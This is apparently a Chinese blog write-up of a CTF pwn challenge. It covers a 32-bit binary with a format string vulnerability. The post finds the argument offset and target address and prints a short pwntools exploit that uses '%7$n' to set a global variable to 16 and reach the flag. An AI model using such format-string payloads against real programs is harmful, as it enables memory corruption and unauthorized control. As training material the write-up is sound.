checksec+运行

就是这个样子
确实还需要学习啊 KEEP LEARNING!!!!!!
32位
NX保护
ida进行中

if num == 16
即可cat flag
那么修改变量的值
明显的格式化字符串漏洞
确定参数位置

第7个
num跟进去
address=0x804A030
准备exp
from pwn import*
p=process('./pwn10')
num_addr=0x804A030
payload=p32(num_addr)+b'aaaaaaaaaaaa%7$n'//需要num=16,12个a填充,4个字节返回地址
p.sendline(payload)
p.interactive()

成功打通
本文介绍了一种利用格式化字符串漏洞的方法,并通过一个具体的32位程序示例,展示了如何设置payload来修改目标变量值以达到触发特定行为的目的。
644

被折叠的 条评论
为什么被折叠?



